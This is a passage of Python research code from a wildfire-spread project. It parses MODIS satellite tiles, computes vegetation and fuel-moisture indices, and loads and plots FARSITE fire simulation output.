speedX_fig = uc.plotContourWithStates(lat,lon,speedX,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
speedY_fig = uc.plotContourWithStates(lat,lon,speedY,label='m/s',
states=None,
clim=None,xlim=None,ylim=None)
```
#### File: datadriven-wildfire-spread/scripts/parse_modis_file.py
```python
import glob
import pyhdf.SD as phdf
import xml.etree.ElementTree as ET
import datetime as dt
from scipy.ndimage.interpolation import zoom
import numpy as np
import util_common as uc
import re
import sys
import math
import scipy.interpolate as scpi
def coordinatesFromTile(tile):
''' This function will return the longitude and latitude MODIS Level 3
tile coordinate from the tile name in the format 'h00v00'
'''
lon = int(tile[1:3])
lat = int(tile[4:])
return lat, lon
def loadGPolygon(file):
''' This function will return the corner latitude and longitudes from a
MODIS Level 3 metadata xml file.
'''
tree = ET.parse(file)
root = tree.getroot()
ps = root[2][9][0][0][0]
p = []
for i in range(0,4):
p.append([float(ps[i][0].text),float(ps[i][1].text)])
return p
def loadXmlDate(file):
''' This function will return the start and end dates from a MODIS Level 3
metadata xml file.
'''
tree = ET.parse(file)
root = tree.getroot()
DT = root[2][8]
fmt = '%Y-%m-%d-%H:%M:%S'
enddate = DT[1].text+'-'+DT[0].text.split('.')[0]
startdate = DT[3].text+'-'+DT[2].text.split('.')[0]
enddate = dt.datetime.strptime(enddate,fmt)
startdate = dt.datetime.strptime(startdate,fmt)
return startdate, enddate
def arrangeGPolygon(p,topleft=1,topright=2,botleft=0,botright=3):
''' This function will rearrange GPolygon points into a human readable
format.
'''
plat = np.array([[p[topleft][1],p[topright][1]],[p[botleft][1],p[botright][1]]])
plon = np.array([[p[topleft][0],p[topright][0]],[p[botleft][0],p[botright][0]]])
return plat, plon
def interpGPolygon(plat,plon,pixels=1200):
''' This function will interpolate the 2x2 coordinate matricies to
pixel x pixel matricies using bilinear interpolation. Note, this function
should not be used with MODIS Level 3 data as the grid is non-linear. Use
invertModisTile instead.
'''
lat = zoom(plat,pixels/2,order=1)
lon = zoom(plon,pixels/2,order=1)
return lat, lon
def loadSdsData(file,sdsname):
''' This function will open an hdf4 file and return the data stored in
the sdsname attribute.
'''
f = phdf.SD(file,phdf.SDC.READ)
sds_obj = f.select(sdsname)
data = sds_obj.get()
return data
def returnDataFile(file):
f = phdf.SD(file,phdf.SDC.READ)
return f
def findXmlTimes(datadir,tiles):
''' This function finds the start and end times of each .hdf.xml file
in datadir within the first tile.
'''
files = glob.glob(datadir+'*'+tiles[0]+'*'+'.hdf')
startdates = []
enddates = []
for file in files:
startdate, enddate = loadXmlDate(file+'.xml')
startdates.append(startdate)
enddates.append(enddate)
return [startdates, enddates], files
def findQueryDateTime(files,dates,queryDateTime):
''' findQueryDateTime: This function takes a list containing start and end
datetimes returns the index of the list which contains a queryDateTime.
If no match is found, returns None.
Using timedeltas from datetime.datetime would have been better.
Unfortunately, that gave an error when the day was the same and the hour
difference was negative since the negative was stored in the day part of
the structure.
'''
index = None
queryDay = queryDateTime.timetuple().tm_yday+((queryDateTime.hour*60+queryDateTime.minute)*60+queryDateTime.second)/(24*60*60)
for i in range(0,len(dates[0])):
lowYearDiff = queryDateTime.year-dates[0][i].year
highYearDiff = dates[1][i].year-queryDateTime.year
lowDay = dates[0][i].timetuple().tm_yday+((dates[0][i].hour*60+dates[0][i].minute)*60+dates[0][i].second)/(24*60*60)
highDay = dates[1][i].timetuple().tm_yday+((dates[1][i].hour*60+dates[1][i].minute)*60+dates[1][i].second)/(24*60*60)
if lowYearDiff < 0:
lowDay = 367
elif lowYearDiff > 0:
lowDay = lowDay-uc.daysInYear(dates[0][i].year)
if highYearDiff < 0:
highDay = 0
elif highYearDiff > 0:
highDay = highDay+uc.daysInYear(dates[0][i].year-1)
if queryDay >= lowDay and queryDay <= highDay:
index = i
#print(dates[0][i],dates[1][i])
if index is not None:
tile = extractTileFromFile(files[index])
datename = files[index].split(tile)[0][-8:-1]
else:
print("Did not find queryDateTime.")
datename = None
return datename
def removeUnlistedTilesFromFiles(datadir,datename,tiles,use_all=False):
''' This will remove tiles which were not included in the list from the
list of files. If the use_all argument is active, it will instead
update the list of tiles to include all files found in the file names.
'''
files = glob.glob(datadir+'*'+datename+'*'+'.hdf')
if use_all:
tiles = findAllTilesFromFiles(files)
updated_files = []
for file in files:
use_file = False
for tile in tiles:
if tile in file:
use_file = True
if use_file:
updated_files.append(file)
return updated_files, tiles
def extractTileFromFile(file):
''' This function uses regular expressions to find .h00v00. in a filename
to extract the MODIS tile.
'''
m = re.search('\.h\d\dv\d\d\.',file)
tile = m.group(0)[1:-1]
return tile
def findAllTilesFromFiles(files):
''' This function finds all MODIS tiles in a list of file names
'''
tiles = []
for file in files:
tile = extractTileFromFile(file)
tiles.append(tile)
return list(set(tiles))
def findAllTilesFromDir(datadir):
''' This function finds all MODIS tiles in a list of file names
'''
files = glob.glob(datadir+'*.hdf')
tiles = []
for file in files:
tile = extractTileFromFile(file)
tiles.append(tile)
return list(set(tiles))
def activeFireDayIndex(dates,queryDateTime):
''' This function finds the index of the queryDateTime within the range
of dates of the (.hdf) file.
'''
index = None
queryDay = queryDateTime.timetuple().tm_yday
lowDay = dates[0].timetuple().tm_yday
highDay = dates[1].timetuple().tm_yday
lowYearDiff = queryDateTime.year-dates[0].year
highYearDiff = dates[1].year-queryDateTime.year
if lowYearDiff == 0:
index = queryDay-lowDay
elif highYearDiff == 0:
index = 8-(highDay-queryDay)
else:
print("Is query within range for the file?")
return index
def invertModisTile(tile,pixels=1200):
''' This function will create a pixel x pixel matrix for latitude and
longitude using the tile name. This algorithm is presented in the
Active Fire Index User Guide.
'''
R=6371007.181
T=1111950
xmin=-20015109
ymax=10007555
w=T/pixels
lat_lnsp = np.linspace(0,pixels-1,pixels)
lon_lnsp = np.linspace(0,pixels-1,pixels)
lon_grid, lat_grid = np.meshgrid(lon_lnsp,lat_lnsp)
H = float(tile[1:3])
V = float(tile[4:])
lat = (ymax-(lat_grid+0.5)*w-V*T)/R*(180/math.pi)
lon = ((lon_grid+0.5)*w+H*T+xmin)/(R*np.cos(lat/180*math.pi))*(180/math.pi)
return lat, lon
def buildContour(files,queryDateTime,
sdsname='FireMask',
composite=True,
greedyMethod=False):
''' This function will combine measurements from multiple
MODIS tiles into a single dataset. The list of file names should
correspond to the same time and be for different tiles. The file names
should reference the (.hdf) files.
'''
#print(files[0])
pixels = loadSdsData(files[0],sdsname).shape[1]
tiles = findAllTilesFromFiles(files)
tiles_grid_dict, tiles_grid = uc.mapTileGrid(tiles,pixels,coordinatesFromTile)
tiles_data = tiles_grid.copy()
tiles_lat = tiles_grid.copy()
tiles_lon = tiles_grid.copy()
for file in files:
p = loadGPolygon(file+'.xml')
startdate, enddate = loadXmlDate(file+'.xml')
plat, plon = arrangeGPolygon(p)
if not composite:
day_index = activeFireDayIndex([startdate,enddate],queryDateTime)
data = loadSdsData(file,sdsname)
if day_index < data.shape[0]:
data = data[day_index,:,:]
else:
print("Required day index does not have data included.")
print("\tdata.shape:\t",data.shape)
print("\tday_index:\t",day_index)
data = None
else:
data = loadSdsData(file,sdsname)
tile = extractTileFromFile(file)
if greedyMethod:
lat, lon = interpGPolygon(plat,plon,pixels=pixels)
else:
lat, lon = invertModisTile(tile)
if data is not None:
tiles_data = uc.fillTileGrid(tiles_data,tiles_grid_dict,tile,data,pixels)
tiles_lat = uc.fillTileGrid(tiles_lat,tiles_grid_dict,tile,lat,pixels)
tiles_lon = uc.fillTileGrid(tiles_lon,tiles_grid_dict,tile,lon,pixels)
#tiles_lat = uc.fillEmptyCoordinates(tiles_lat,tiles,pixels,coordinatesFromTile)
#tiles_lon = uc.fillEmptyCoordinates(tiles_lon,tiles,pixels,coordinatesFromTile)
return tiles_lat, tiles_lon, tiles_data
def findQuerySdsData(queryDateTime,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
tiles=['h08v04','h08v05','h09v04'],
composite=False,
use_all=False,
sdsname='1 km 16 days NDVI'):
''' This function will find the specified sdsname for each tile in tiles
within the datadir and find the closest to the queryDateTime. Matrices
of the latitutde, longitude, and data are returned.
'''
# Arrange files and tiles
if tiles is None:
tiles = findAllTilesFromDir(datadir)
dates, files = findXmlTimes(datadir,tiles)
datename = findQueryDateTime(files,dates,queryDateTime)
files, tiles = removeUnlistedTilesFromFiles(datadir,datename,tiles,use_all=use_all)
# Load all tiles at the queryDateTime
lat,lon,data = buildContour(files,queryDateTime,sdsname=sdsname,composite=composite)
return lat, lon, data
def geolocateCandidates(lat,lon,data):
''' This function extracts latitude and longitude corresponding to points
in the binary mask data.
'''
r,c = np.where(data > 0)
pts = []
coords = []
for i in range(0,len(r)):
ptlat = lat[r[i],c[i]]
ptlon = lon[r[i],c[i]]
ptdat = data[r[i],c[i]]
pts.append([ptlat,ptlon,ptdat])
coords.append([r[i],c[i]])
coords = np.array(np.squeeze(coords),dtype=np.int)
pts = np.array(pts)
return pts, coords
def compareCandidates(old_pts,new_pts,dist_thresh=0.5):
''' This function compares two sets of points to return minimum distance
to a point in the new_pts set from an old_pt. dist_thresh is the minimum
distance away for two points to be considered a match in degrees.
NOTE: 1 degree is approximately 69 miles, or 111 km
NOTE: Modis resolution is approximately 1km
'''
matched_pts = []
if old_pts.shape[0] != 0 and new_pts.shape[0] != 0:
for i in range(0,old_pts.shape[0]):
squared = np.power(new_pts[:,0:2]-old_pts[i,0:2],2)
summed = np.sum(squared,axis=1)
rooted = np.power(summed,0.5)
min_dist = np.min(rooted)
if min_dist <= dist_thresh:
matched_pts.append([i,min_dist*111,np.argmin(rooted)])
matched_pts = np.array(matched_pts)
return matched_pts
def buildOneDayContour(files,sdsname='sur_refl_b01',targetPixels=1200):
pixels = loadSdsData(files[0],sdsname).shape[1]
zoomLevel = targetPixels/pixels
tiles = findAllTilesFromFiles(files)
tiles_grid_dict, tiles_grid = uc.mapTileGrid(tiles,targetPixels,coordinatesFromTile)
tiles_data = tiles_grid.copy()
tiles_lat = tiles_grid.copy()
tiles_lon = tiles_grid.copy()
for file in files:
data = loadSdsData(file,sdsname)
data = zoom(data,zoomLevel)
tile = extractTileFromFile(file)
lat, lon = invertModisTile(tile,pixels=targetPixels)
if data is not None:
tiles_data = uc.fillTileGrid(tiles_data,tiles_grid_dict,tile,data,targetPixels)
tiles_lat = uc.fillTileGrid(tiles_lat,tiles_grid_dict,tile,lat,targetPixels)
tiles_lon = uc.fillTileGrid(tiles_lon,tiles_grid_dict,tile,lon,targetPixels)
return tiles_lat, tiles_lon, tiles_data
def list2stats(datas,name=''):
dataMedian = np.median(datas,axis=0)
dataMean = np.nanmean(datas,axis=0)
dataMin = np.nanmin(datas,axis=0)
dataMax = np.nanmax(datas,axis=0)
uc.dumpPickle([dataMin,dataMax,dataMedian,dataMean],name)
return dataMin, dataMax, dataMedian, dataMean
def generateVegetationStats(datadir="G:/WildfireResearch/data/aqua_reflectance/",
outdir="E:/projects/wildfire-research/data-test/",
tiles=['h08v04','h08v05','h09v04']):
''' This function will store out images with the min, max, median, and mean
values of VIGR, NDVI, VARI, and NDI16. These are needed for moisture
content estimation.
'''
files = glob.glob(datadir+'*.hdf')
dates = []
for file in files:
dates.append(file.split("//")[1].split('.')[1])
dates = list(set(dates))
ndvis = []
varis = []
ndi16s = []
vigrs = []
for i in range(0,len(dates)):#date in dates:
date = dates[i]
files = glob.glob(datadir+'/*'+date+'*.hdf')
goodFiles = []
for file in files:
tileCheck = False
for tile in tiles:
if tile in file:
tileCheck = True
if tileCheck:
goodFiles.append(file)
lat,lon,rho1 = buildOneDayContour(goodFiles,sdsname='sur_refl_b01')
lat,lon,rho2 = buildOneDayContour(goodFiles,sdsname='sur_refl_b02')
lat,lon,rho3 = buildOneDayContour(goodFiles,sdsname='sur_refl_b03')
lat,lon,rho4 = buildOneDayContour(goodFiles,sdsname='sur_refl_b04')
lat,lon,rho6 = buildOneDayContour(goodFiles,sdsname='sur_refl_b06')
num_ndvi = np.array(rho2-rho1,dtype=np.float32)
den_ndvi = np.array(rho2+rho1,dtype=np.float32)
ndvi = np.zeros(num_ndvi.shape)
ndvi[den_ndvi > 0] = num_ndvi[den_ndvi > 0]/den_ndvi[den_ndvi > 0]
ndvis.append(ndvi)
num_vari = rho4-rho1
den_vari = rho4+rho1-rho3
vari = np.zeros(num_vari.shape)
vari[den_vari > 0] = num_vari[den_vari > 0]/den_vari[den_vari > 0]
varis.append(vari)
num_ndi16 = rho2-rho6
den_ndi16 = rho2+rho6
ndi16 = np.zeros(num_ndi16.shape)
ndi16[den_ndi16 > 0] = num_ndi16[den_ndi16 > 0]/den_ndi16[den_ndi16 > 0]
ndi16s.append(ndi16)
num_vigr = rho4-rho1
den_vigr = rho4+rho1
vigr = np.zeros(num_vigr.shape)
vigr[den_vigr > 0] = num_vigr[den_vigr > 0]/den_vigr[den_vigr > 0]
vigrs.append(vigr)
vigrMin, vigrMax, vigrMedian, vigrMean = list2stats(vigrs,name=outdir+'vigrStats2016.pkl')
ndviMin, ndviMax, ndviMedian, ndviMean = list2stats(ndvis,name=outdir+'ndviStats2016.pkl')
variMin, variMax, variMedian, variMean = list2stats(varis,name=outdir+'variStats2016.pkl')
ndi16Min, ndi16Max, ndi16Median, ndi16Mean = list2stats(ndi16s,name=outdir+'ndi16Stats2016.pkl')
uc.dumpPickle([dates,lat,lon,vigrs],outdir+'vigrAll.pkl')
uc.dumpPickle([dates,lat,lon,ndvis],outdir+'ndvisAll.pkl')
uc.dumpPickle([dates,lat,lon,varis],outdir+'varisAll.pkl')
uc.dumpPickle([dates,lat,lon,ndi16s],outdir+'ndi16sAll.pkl')
return dates, ndvis, varis, ndi16s, vigrs
def getLfmChap(vari,lfmLowerThresh=0,lfmUpperThresh=200,
vigrFile="E:/projects/wildfire-research/data-test/vigrStats2016.pkl"):
''' This function will return chapperal moisture estimation based on
VARI measurement.
'''
vigrMin, vigrMax, vigrMedian, vigrMean = uc.readPickle(vigrFile)
lfm = 97.8+471.6*vari-293.9*vigrMedian-816.2*vari*(vigrMax-vigrMin)
lfm[lfm<lfmLowerThresh] = lfmLowerThresh
lfm[lfm>lfmUpperThresh] = lfmUpperThresh
return lfm
def getLfmCss(vari,lfmLowerThresh=0,lfmUpperThresh=200,
ndi16File="E:/projects/wildfire-research/data-test/ndi16Stats2016.pkl",
ndviFile="E:/projects/wildfire-research/data-test/ndviStats2016.pkl"):
''' This function will return coastal ss moisture estimation beased on
VARI measurement.
'''
ndi16Min, ndi16Max, ndi16Median, ndi16Mean = uc.readPickle(ndi16File)
ndviMin, ndviMax, ndviMedian, ndviMean = uc.readPickle(ndviFile)
lfm = 179.2 + 1413.9*vari-450.5*ndi16Median-1825.2*vari*(ndviMax-ndviMin)
lfm[lfm<lfmLowerThresh] = lfmLowerThresh
lfm[lfm>lfmUpperThresh] = lfmUpperThresh
return lfm
def buildCanopyData(datadir='G:/WildfireResearch/data/terra_canopy/',
outdir = "E:/projects/wildfire-research/data-test/",
sdsname='Percent_Tree_Cover',
outname='canopy.pkl'):
ds = 1
method='linear'
files = glob.glob(datadir+'/*.hdf')
#f = returnDataFile(files[0])
lat,lon,data = buildOneDayContour(files,sdsname=sdsname,targetPixels=1200)
data[lat==0] = np.nan
lat[lat == 0] = np.nan
lon[lon == 0] = np.nan
data[data > 100] = 100
lat = np.reshape(lat,(lat.shape[0]*lat.shape[1]))
lon = np.reshape(lon,(lon.shape[0]*lon.shape[1]))
values = np.reshape(data,(data.shape[0]*data.shape[1]))
inds = np.where(~np.isnan(lat) & ~np.isnan(lon) & ~np.isnan(values))
lat = lat[inds]
lon = lon[inds]
values = values[inds]
pts = np.zeros((len(lat),2))
pts[:,0] = lat
pts[:,1] = lon
newpts, sz = getCustomGrid(reshape=True)
remapped = scpi.griddata(pts[0::ds],values[0::ds],newpts,method=method)
data = np.reshape(remapped,(sz[0],sz[1]))
latitude, longitude = getCustomGrid(reshape=False)
uc.dumpPickle([latitude,longitude,data],outdir+outname)
return latitude, longitude, data
def getCustomGrid(lat_lmt = [30,44],
lon_lmt = [-126,-112],
pxPerDegree = 120,
ds=1,
method='nearest',
reshape=False):
''' This function will generate custom MODIS grid
'''
lat_lnsp = np.linspace(np.min(lat_lmt),np.max(lat_lmt),
(np.max(lat_lmt)-np.min(lat_lmt)+1)*pxPerDegree)
lon_lnsp = np.linspace(np.min(lon_lmt),np.max(lon_lmt),
(np.max(lon_lmt)-np.min(lon_lmt)+1)*pxPerDegree)
lon_grid, lat_grid = np.meshgrid(lon_lnsp,lat_lnsp)
if reshape:
lon_lnsp2 = np.reshape(lon_grid,(lon_grid.shape[0]*lon_grid.shape[1]))
lat_lnsp2 = np.reshape(lat_grid,(lat_grid.shape[0]*lat_grid.shape[1]))
newpts = np.zeros((len(lat_lnsp2),2))
newpts[:,0] = lat_lnsp2
newpts[:,1] = lon_lnsp2
sz = lat_grid.shape
return newpts, sz
else:
return lat_grid, lon_grid
if __name__ == '__main__':
''' case 0: loads modis vegetation index at queryDateTime and plots for
the whole United states
case 1: Loads modis active fires at queryDateTime and plots for
California
case 2: Loads modis vegetation index, active fires, and burned area
at queryDateTime for California.
case 3: Loads modis active fires at 365 consecuitive queryDateTimes
and saves the results.
'''
# User inputs
queryDateTime = dt.datetime(year=2017,month=7,day=9,hour=6,minute=00)
case = 1
if case == 0:
tiles = None
states = 'All'
#Find vegetation index at queryDateTime
vi_lat,vi_lon,vi_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
sdsname='1 km 16 days NDVI')
vi_fig = uc.plotContourWithStates(vi_lat,vi_lon,vi_data,states=states,label='VI')
vi_mem = (sys.getsizeof(vi_data)+sys.getsizeof(vi_lat)+sys.getsizeof(vi_lon))/1024**2
print("VI File Size: %.4f MB"%(vi_mem))
if case == 1:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/aqua_daily_activefires/",
sdsname='FireMask')
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF',
xlim=[-121.5, -118.5], ylim=[33.5, 36.5], saveFig=True)
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
print("AF File Size: %.4f MB"%(af_mem))
if case == 2:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/aqua_daily_activefires/",
sdsname='FireMask')
#Find vegetation index at queryDateTime
vi_lat,vi_lon,vi_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/aqua_vegetation/",
sdsname='1 km 16 days NDVI')
#Find burned area at queryDateTime
ba_lat,ba_lon,ba_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=True,
datadir="G:/WildfireResearch/data/modis_burnedarea/",
sdsname='burndate')
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF')
vi_fig = uc.plotContourWithStates(vi_lat,vi_lon,vi_data,states=states,label='VI')
ba_fig = uc.plotContourWithStates(ba_lat,ba_lon,ba_data,states=states,label='BA')
vi_mem = (sys.getsizeof(vi_data)+sys.getsizeof(vi_lat)+sys.getsizeof(vi_lon))/1024**2
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
ba_mem = (sys.getsizeof(ba_data)+sys.getsizeof(ba_lat)+sys.getsizeof(ba_lon))/1024**2
total_mem = vi_mem+af_mem+ba_mem
print("VI, AF, BA, Total File Size: %.4f,%.4f,%.4f,%.4f MB"%(vi_mem,af_mem,ba_mem,total_mem))
if case == 3:
tiles = ['h08v04','h08v05','h09v04']
states = 'California'
# Find activefires at queryDateTime
#queryDateTime = dt.datetime(year=2016,month=1,day=1,hour=12,minute=0)
outdir = 'E:\\projects\\forensics\\parkfield\\'
for i in range(0,365):
af_name = outdir+'AF2_'+queryDateTime.isoformat()[0:13]+'.png'
af_lat,af_lon,af_data = findQuerySdsData(queryDateTime,tiles=tiles,composite=False,
datadir="G:/WildfireResearch/data/terra_daily_activefires/",
sdsname='FireMask')
if af_data is not None:
af_fig = uc.plotContourWithStates(af_lat,af_lon,af_data,states=states,
clim=np.linspace(0,9,10),label='AF',
saveFig=True,saveName=af_name)
af_mem = (sys.getsizeof(af_data)+sys.getsizeof(af_lat)+sys.getsizeof(af_lon))/1024**2
data_mask = af_data.copy()
data_mask[data_mask < 7] = 0
pts = geolocateCandidates(af_lat,af_lon,data_mask)
if i > 0:
match_pts = compareCandidates(old_pts,pts)
if match_pts.shape[0] > 0:
print("Time %s found %.0f matches with the closest %.4f km."%(queryDateTime.isoformat(),match_pts.shape[0],np.min(match_pts[:,1])))
else:
pass
queryDateTime = queryDateTime + dt.timedelta(days=1)
old_pts = pts
else:
old_pts = np.array([])
#print(match_pts)
print("AF File Size: %.4f MB"%(af_mem))
if case == 4:
datadir = "E:/projects/wildfire-research/data-test/"
dates, lat, lon, varis = uc.readPickle(datadir+'varisAll.pkl')
for i in range(0,1):#len(varis)):
lfm_chap = getLfmChap(varis[i])
#lfm_css = getLfmCss(varis[i])
uc.plotContourWithStates(lat,lon,lfm_chap,
clim=np.linspace(0,200,11))
#saveFig=True,saveName=datadir+"lfmCss_"+dates[i]+".png",)
if case == 5:
lat, lon, data = buildCanopyData()
uc.plotContourWithStates(lat,lon,data,clim=np.linspace(0,100,11))
"""
datadir = 'G:/WildfireResearch/data/terra_canopy/'
outdir = "E:/projects/wildfire-research/data-test/"
files = glob.glob(datadir+'/*.hdf')
#f = returnDataFile(files[0])
lat,lon,data = buildOneDayContour(files,sdsname='Percent_Tree_Cover',targetPixels=1200)
data[lat==0] = np.nan
lat[lat == 0] = np.nan
lon[lon == 0] = np.nan
data[data > 100] = 100
uc.plotContourWithStates(lat,lon,data,clim=np.linspace(0,100,11))
uc.dumpPickle([lat,lon,data],outdir+'canopy.pkl')
"""
```
#### File: datadriven-wildfire-spread/scripts/prepareFarsiteData.py
```python
import subprocess
import os
import behavePlus as bp
import numpy as np
import datetime
import queryLandFire as qlf
import geopandas as gpd
from shapely.geometry import Polygon, Point
import matplotlib.pyplot as plt
import rasterio
from rasterio import features
import rasterio.plot as rsplot
import math
import glob
import tensorflow as tf
import sys
import h5py
def convertVector(speed,direction):
''' This function will convert wind speed measurements from polar
coordinates to Cartesian coordinates.
'''
if direction == -1:
speedX = speed/(2**0.5)
speedY = speed/(2**0.5)
elif direction is None:
pass
print("Wind direction was not set.")
elif speed is None:
pass
print("Wind speed was not set.")
else:
try:
speedX = speed*np.sin(direction/180*math.pi)
speedY = speed*np.cos(direction/180*math.pi)
except:
assert False, "Unknown wind vector: %s Mps %s Deg" % (str(speed),str(direction))
return speedX, speedY
def plotWildfireData(datas,names,
clims=None,closeFig=None,
saveFig=False,saveName=''):
totalPlots = np.ceil(float(len(datas))**0.5)
colPlots = totalPlots
rowPlots = np.ceil((float(len(datas)))/colPlots)
currentPlot = 0
if saveFig:
fntsize = 20
lnwidth = 5
fig = plt.figure(figsize=(colPlots*12,rowPlots*10))#,tight_layout=True)
if closeFig is None:
closeFig = True
else:
fig = plt.figure(figsize=(colPlots*6,rowPlots*5))#,tight_layout=True)
fntsize = 20
lnwidth = 2
if closeFig is None:
closeFig = False
xmin = 0
xmax = datas[0].shape[1]
xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/10)+1))
ymin = 0
ymax = datas[0].shape[0]
yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/10)+1))
for i in range(0,len(names)):
key = names[i]
currentPlot = currentPlot+1
ax = fig.add_subplot(rowPlots,colPlots,currentPlot)
ax.tick_params(axis='both',labelsize=fntsize)
plt.xticks(xticks)
plt.yticks(yticks)
plt.title(key,fontsize=fntsize)
if clims is None:
clim = np.linspace(0,1,10)
label = ''
else:
clim = clims[i]
label = ''
img = ax.imshow(datas[i],cmap='jet',vmin=clim[0],vmax=clim[-1])#,vmin=0,vmax=1)
img_cb = plt.colorbar(img,ax=ax,label=label)
img_cb.set_label(label=label,fontsize=fntsize)
img_cb.ax.tick_params(axis='both',labelsize=fntsize)
ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k')
for ln in ax.lines:
ln.set_linewidth(lnwidth)
if saveFig:
fig.savefig(saveName)
if closeFig:
plt.clf()
plt.close(fig)
def parseFarsiteInput(filename):
with open(filename,'r') as f:
lines = f.readlines()
moistures = []
weathers = []
winds = []
for line in lines:
if 'FUEL_MOISTURES_DATA' in line:
switch = 'moisture'
elif 'WEATHER_DATA' in line:
switch = 'weather'
elif 'WIND_DATA' in line:
switch = 'wind'
lineSplit = line.split(' ')
if lineSplit[0].isdigit():
lineArray = np.array([float(x) for x in lineSplit])
if switch == 'moisture':
moistures.append(lineArray)
elif switch == 'weather':
weathers.append(lineArray)
elif switch == 'wind':
winds.append(lineArray)
moistures = np.array(moistures)
weathers = np.array(weathers)
winds = np.array(winds)
return moistures, weathers, winds
def lineStringToPolygon(data):
if data.shape[0] <= 200:
#assert False, "Stopped"
for i in range(0,data.shape[0]):
data['geometry'][i] = Polygon(list(data['geometry'][i].coords))
else:
#assert False, "Stopped"
for i in range(0,data.shape[0]):
data['geometry'][i] = Polygon(list(data['geometry'][i].coords))
return data
def loadFarsiteOutput(namespace,commandFarsite=True):
#imgs, names, headers = qlf.readLcpFile(inDir+namespace+'.LCP')
#header = qlf.parseLcpHeader(headers)
dataOut = gpd.GeoDataFrame.from_file(namespace+'_out_Perimeters.shp')
if commandFarsite:
dataOut = lineStringToPolygon(dataOut)
testDate = [datetime.datetime(year=2016, month=int(x), day=int(y), hour=int(z)).timestamp() for x,y,z in zip(dataOut['Month'].values,dataOut['Day'].values,dataOut['Hour'].values/100)]
testDate = np.array(testDate,dtype=np.float32)
testDate = np.array((testDate-testDate[0])/3600,dtype=np.int16) #/3600
dataOut['time'] = testDate
#lcpData = rasterio.open(inDir+namespace+'.LCP')
return dataOut
def loadFarsiteLcp(lcpNamespace):
lcpData = rasterio.open(lcpNamespace)
return lcpData
def downsampleImage(img,interval):
newImg = img[::interval,::interval].copy()
return newImg
def plotTimeContour(img,imgBand,contours,namespace):
fs = 16
contours = contours.reindex(index=contours.index[::-1])
fig, ax = plt.subplots(figsize=(12,8))
rsplot.show((img,imgBand),with_bounds=True,ax=ax,cmap='gray')
vmin = np.min(contours.time)
vmax = np.max(contours.time)
contours.plot(ax=ax, cmap='jet', scheme='time')
sm = plt.cm.ScalarMappable(cmap='jet_r', norm=plt.Normalize(vmin=vmin,vmax=vmax))
sm._A = []
cbar = fig.colorbar(sm)
cbar.ax.set_ylabel('Time since Ignition (Hours)',rotation=270,fontsize=fs)
cbar.ax.get_yaxis().labelpad = 20
cbar.ax.tick_params(labelsize=fs)
cbar.ax.invert_yaxis()
plt.tick_params(labelsize=fs)
ax.ticklabel_format(axis='both', style='sci', scilimits=(-2,2))
plt.tight_layout()
plt.xlabel('NAD83 EW %s'%(ax.xaxis.offsetText.get_text()),fontsize=fs)
plt.ylabel('NAD83 NS %s'%(ax.yaxis.offsetText.get_text()),fontsize=fs)
ax.yaxis.offsetText.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
plt.savefig(namespace)
return fig
def getRasterFromPolygon(data,tF,ind,value,sz):
outArr = np.zeros(sz)
shapes = ((geom,value) for geom, value in zip(data.iloc[:ind,:].geometry, np.zeros((data.iloc[:ind,:].shape[0],),dtype=np.int16)+value)) #dataOut.iloc[:i+1,:].time))
raster = np.array(features.rasterize(shapes=shapes, fill=1, out=outArr, transform=tF)).copy()
return raster
def parseMoistures(moistures):
fm, m1h, m10h, m100h, lhm, lwm = np.median(moistures,axis=0)
return m1h, m10h, m100h, lhm, lwm
def makeConstImage(sz,value):
img = np.zeros(sz)+value
return img
def remapFuelImg(img):
modelIndexDict = bp.determineFastestModel()
fuelModelsIdx = bp.buildFuelModelsIdx()
sz = img.shape
imgRs = img.reshape((sz[0]*sz[1],))
imgStr = fuelModelsIdx[imgRs]
imgRsNew = [modelIndexDict[x] for x in imgStr]
imgNew = np.reshape(imgRsNew,(sz[0],sz[1]))
return imgNew
def visualizeFarsiteResult(namespace,lcpNamespace,perimeterOnly=True):
moistures, weathers, winds = parseFarsiteInput(namespace+'.input')
windSpeed = np.median(winds[:,3])
windDir = np.median(winds[:,4])
windX,windY = convertVector(windSpeed,windDir)
m1h, m10h, m100h, lhm, lwm = parseMoistures(moistures)
fs = 16
interval = int(np.ceil(1000/30))
dataOut = loadFarsiteOutput(namespace)
lcpData = loadFarsiteLcp(inDir+lcpNamespace)
fig = plotTimeContour(lcpData,1,dataOut,namespace+'_p.png')
plt.close()
if not perimeterOnly:
elevImg = np.array(lcpData.read(1),dtype=np.float32)
elevImg = elevImg-np.median(elevImg)
fuelImg = lcpData.read(4)
canopyImg = np.array(lcpData.read(5),dtype=np.float32)/100
canopyHeightImg = np.array(lcpData.read(6),dtype=np.float32)/10
canopyBaseHeightImg = np.array(lcpData.read(7),dtype=np.float32)/10
canopyDensityImg = np.array(lcpData.read(8),dtype=np.float32)/100
sz = elevImg.shape
elevImg = downsampleImage(elevImg,interval)
fuelImg = downsampleImage(fuelImg,interval)
canopyImg = downsampleImage(canopyImg,interval)
canopyHeightImg = downsampleImage(canopyHeightImg,interval)
canopyBaseHeightImg = downsampleImage(canopyBaseHeightImg,interval)
canopyDensityImg = downsampleImage(canopyDensityImg,interval)
fuelImg = remapFuelImg(fuelImg)
smallSz = elevImg.shape
